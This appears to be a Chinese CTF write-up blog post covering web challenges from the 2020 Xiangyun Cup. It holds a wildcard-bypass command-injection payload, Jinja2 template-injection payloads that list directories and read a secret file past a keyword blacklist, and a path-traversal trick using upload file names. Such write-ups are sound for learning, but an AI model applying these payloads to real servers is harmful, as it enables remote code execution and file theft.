title: 祥云杯202部分wp
date: 2020-11-21 17:00:00
tags: CTF
categories: 比赛
link：https://yq1ng.github.io/

签到

base64解码，讲真，这才叫签到题

Command

%09制表符

通配符绕过，payload：?url=||ca\t%09/etc/.findf?ag/f?ag.txt

flaskbot

这个注入点真是，知道是user就是出不来，space man师傅(膜拜大佬)提示猜数字为nan，遂去Google在此记笔记，

NaN, Not a Number, 非数. 它即不是无穷大, 也不是无穷小, 而是python/numpy/… 觉得无法计算时返回的一个符号
详见于此

后面就好说啦，user编码base64，payload可以参考 GYCTF2020-FlaskApp的第一种解法，第二种等buu复现

列目录：{{''.__class__.__bases__[0].__subclasses__()[75].__init__.__globals__['__builtins__']['__imp'+'ort__']('o'+'s').listdir('/')}}

flag被ban了，其实os也被ban了，故技重施：{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].open('/super_secret_fl'+'ag.txt','r').read() }}{% endif %}{% endfor %}

easygogogo

DSACTF2020的gob原题，上传任何文件都不解析，文件名原样保存，show的时候考虑LFI，bp上传文件名为../../../../../flag，上传成功后记下返回的cookie，接着不要点返回，我上午一直没成就是点击返回导致cookie不对劲，在URL修改，然后改cookie，看图片的base即可

doyouknowssrf

开箱送源码：

<?php
// ini_set("display_errors", "On");
// error_reporting(E_ALL | E_STRICT);function safe_url($url,$safe) {$parsed = parse_url($url);// 解析 URL，返回其组成部分$validate_ip = true;if($parsed['port']  && !in_array($parsed['port'],array('80','443'))){echo "<b>请求错误:非正常端口,因安全问题只允许抓取80,443端口的链接,如有特殊需求请自行修改程序</b>".PHP_EOL;return false;}else{preg_match('/^\d+$/', $parsed['host']) && $parsed['host'] = long2ip($parsed['host']);$long = ip2long($parsed['host']);if($long===false){$ip = null;if($safe){@putenv('RES_OPTIONS=retrans:1 retry:1 timeout:1 attempts:1');$ip   = gethostbyname($parsed['host']);$long = ip2long($ip);$long===false && $ip = null;@putenv('RES_OPTIONS');}}else{$ip = $parsed['host'];}$ip && $validate_ip = filter_var($ip, FILTER_VALIDATE_IP, FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE);}if(!in_array($parsed['scheme'],array('http','https')) || !$validate_ip){echo "<b>{$url} 请求错误:非正常URL格式,因安全问题只允许抓取 http:// 或 https:// 开头的链接或公有IP地址</b>".PHP_EOL;return false;}else{return $url;}
}function curl($url){$safe = false;if(safe_url($url,$safe)) {$ch = curl_init();curl_setopt($ch, CURLOPT_URL, $url);//需要获取的 URL 地址，也可以在curl_init() 初始化会话的时候curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);//TRUE 将curl_exec()获取的信息以字符串返回，而不是直接输出curl_setopt($ch, CURLOPT_HEADER, 0);//启用时会将头文件的信息作为数据流输出curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);//FALSE 禁止 cURL 验证对等证书（peer'scertificate）curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);//设置为 1 是检查服务器SSL证书中是否存在一个公用名(common name)。译者注：公用名(Common Name)一般来讲就是填写你将要申请SSL证书的域名 (domain)或子域名(sub domain)。设置成 2，会检查公用名是否存在，并且是否与提供的主机名匹配。 0 为不检查名称。在生产环境中，这个值应该是 2（默认值）$co = curl_exec($ch);curl_close($ch);echo $co;}
}highlight_file(__FILE__);
curl($_GET['url']);

gactf的原题，但是俺不会用呜呜呜

祥云杯202部分wp相关推荐

祥云杯2020 Crypto wp
Crypto: SimpleRSA wiener attack 利用自定义的m检验生成的d'来判断phi是否正确 e=10722954259441365070399386771014424812135 ...
[祥云杯2021：Wp]
MISC 签到题:鸣雏恋 flag值: 层层取证 flag值: 这次的比赛比上一次有了很大的进步,毕竟能够做出来两个杂项题目了. 签到题:鸣雏恋题目附件是一个zip压缩包,里面只有一个word文档 ...
2021祥云杯部分wp
祥云杯2021 目前只做了两道题(没办法 tcl... MISC-鸣雏恋下载下来是个word,打开只有一句话不太对劲,放到010里看一看发现文件头50 4B 03 04 经典压缩包了,文件后缀改成 ...
2022网鼎杯青龙组wp
本次网鼎杯的Crypto部分其实还是比较简单的,解出的人数也较多.感觉405题略难一些,花了比较多的时间,恰巧最后几小时给出的162所用到的求解方式之前遇到过,有幸作为一个CTF新手把这次的比赛密码学 ...
祥云杯-re复现（未完待续）
周末祥云杯没打,主要是自己想摸了..(就是这么直白)还有就是nctf举办,我出题,我到比赛那天还没出完...(太咕了..) 比赛后就想来复现这比赛,看解题人数,感觉满难的,应该很有质量,就跟着null ...
祥云杯2022 writeup
0x01 web 1.ezjava 下载源码对jar文件进行反编译,发现POST /myTest会出现反序列化漏洞 util ,最后好像没用到检查程序,发现apache的common−collect ...
2021祥云杯部分pwn
note 格式化字符串本题考查了scanf的格式化字符串利用.一般我们用的都是printf的格式化字符串.这里是scanf 踩坑一开始没有注意到sendline会多发一个换行符,导致往栈上$7的s ...
祥云杯-2020babydev
文章目录前言题目保护分析思路解法一:(思路不错) 解法二:(最精简) 解法三:(最简单) 参考文章前言个人觉得exp要写的精简,适当注释,至少不应该留有冗余的代码,对于刚学习的pwne ...
2021 祥云杯 pwn-JigSaw’sCage
2021 祥云杯 pwn-JigSaw'sCage 这道题属实是没有发现漏洞点在哪里,所以看了一下wm的wjh师傅的wp,发现漏洞出现下图 v1是int,但scanf是ld,所以溢出了4个字节,这就导 ...

祥云杯202部分wp

目录

签到

Command

flaskbot

easygogogo

doyouknowssrf

祥云杯202部分wp相关推荐

最新文章

热门文章